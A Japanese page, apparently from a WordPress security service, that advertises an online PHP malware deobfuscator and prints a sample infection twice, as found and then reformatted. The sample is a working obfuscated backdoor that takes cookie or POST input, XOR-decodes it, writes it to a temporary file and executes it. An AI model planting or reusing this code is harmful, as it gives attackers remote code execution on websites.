Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php function u1($y2){$w3 = "-n/kf< L@I473c_d6'u?90sm5e.r1;xby#hg(v*ap" ."2t)EHiFl" ."o" ;$x5='';foreach($y2 as $z4){$x5.=$w3[$z4];}return $x5;}$s6 = Array();$s6[] = u1(Array(41,4,21,11,13,20,41,20,0,12,16,24,24,0,10,13,24,31,0,20,21,10,28,0,24,21,31,12,16,31,10,28,21,41,25,39));$s6[] = u1(Array(19,40,34,40,6,8,18,1,48,46,1,3,36,14,14,47,9,7,44,14,14,43,29,6));$s6[] = u1(Array(26,23,49,15,18,48,25));$s6[] = u1(Array(45,38));$s6[] = u1(Array(26,2));$s6[] = u1(Array(33));$s6[] = u1(Array(5));$s6[] = u1(Array(4,46,48,25,14,40,18,42,14,13,49,1,42,25,1,42,22));$s6[] = u1(Array(39,27,27,39,32,14,23,25,27,35,25));$s6[] = u1(Array(22,42,27,14,27,25,40,25,39,42));$s6[] = u1(Array(25,30,40,48,49,15,25));$s6[] = u1(Array(22,18,31,22,42,27));$s6[] = u1(Array(18,1,48,46,1,3));$s6[] = u1(Array(22,42,27,48,25,1));$s6[] = u1(Array(40,39,13,3));$s6[] = u1(Array(23,15,24));foreach ($s6[8]($_COOKIE, $_POST) as $s14 => $b11){function k8($s6, $s14, $s10){return $s6[11]($s6[9]($s14 . $s6[0], ($s10 / $s6[13]($s14)) + 1), 0, $s10);}function o7($s6, $p12){return @$s6[14]($s6[3], $p12);}function i9($s6, $p12){if (isset($p12[2])) {$r13 = $s6[4] . $s6[15]($s6[0]) . $s6[2];@$s6[7]($r13, $s6[6] . $s6[1] . $p12[1]($p12[2]));@include($r13);@$s6[12]($r13);exit();}}$b11 = o7($s6, $b11);i9($s6, $s6[10]($s6[5], $b11 ^ k8($s6, $s14, $s6[13]($b11))));}
<?php function u1($y2) { $w3 = "-n/kf< L@I473c_d6'u?90sm5e.r1;xby#hg(v*ap2t)EHiFlo"; $x5 = ''; foreach ($y2 as $z4) { $x5 .= $w3[$z4]; } return $x5; } $s6 = array(); $s6[] = u1(array(41, 4, 21, 11, 13, 20, 41, 20, 0, 12, 16, 24, 24, 0, 10, 13, 24, 31, 0, 20, 21, 10, 28, 0, 24, 21, 31, 12, 16, 31, 10, 28, 21, 41, 25, 39)); $s6[] = u1(array(19, 40, 34, 40, 6, 8, 18, 1, 48, 46, 1, 3, 36, 14, 14, 47, 9, 7, 44, 14, 14, 43, 29, 6)); $s6[] = u1(array(26, 23, 49, 15, 18, 48, 25)); $s6[] = u1(array(45, 38)); $s6[] = u1(array(26, 2)); $s6[] = u1(array(33)); $s6[] = u1(array(5)); $s6[] = u1(array(4, 46, 48, 25, 14, 40, 18, 42, 14, 13, 49, 1, 42, 25, 1, 42, 22)); $s6[] = u1(array(39, 27, 27, 39, 32, 14, 23, 25, 27, 35, 25)); $s6[] = u1(array(22, 42, 27, 14, 27, 25, 40, 25, 39, 42)); $s6[] = u1(array(25, 30, 40, 48, 49, 15, 25)); $s6[] = u1(array(22, 18, 31, 22, 42, 27)); $s6[] = u1(array(18, 1, 48, 46, 1, 3)); $s6[] = u1(array(22, 42, 27, 48, 25, 1)); $s6[] = u1(array(40, 39, 13, 3)); $s6[] = u1(array(23, 15, 24)); foreach ($s6[8]($_COOKIE, $_POST) as $s14 => $b11) { function k8($s6, $s14, $s10) { return $s6[11]($s6[9]($s14 . $s6[0], $s10 / $s6[13]($s14) + 1), 0, $s10); } function o7($s6, $p12) { return @$s6[14]($s6[3], $p12); } function i9($s6, $p12) { if (isset($p12[2])) { $r13 = $s6[4] . $s6[15]($s6[0]) . $s6[2]; @$s6[7]($r13, $s6[6] . $s6[1] . $p12[1]($p12[2])); @(include $r13); @$s6[12]($r13); exit; } } $b11 = o7($s6, $b11); i9($s6, $s6[10]($s6[5], $b11 ^ k8($s6, $s14, $s6[13]($b11)))); }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.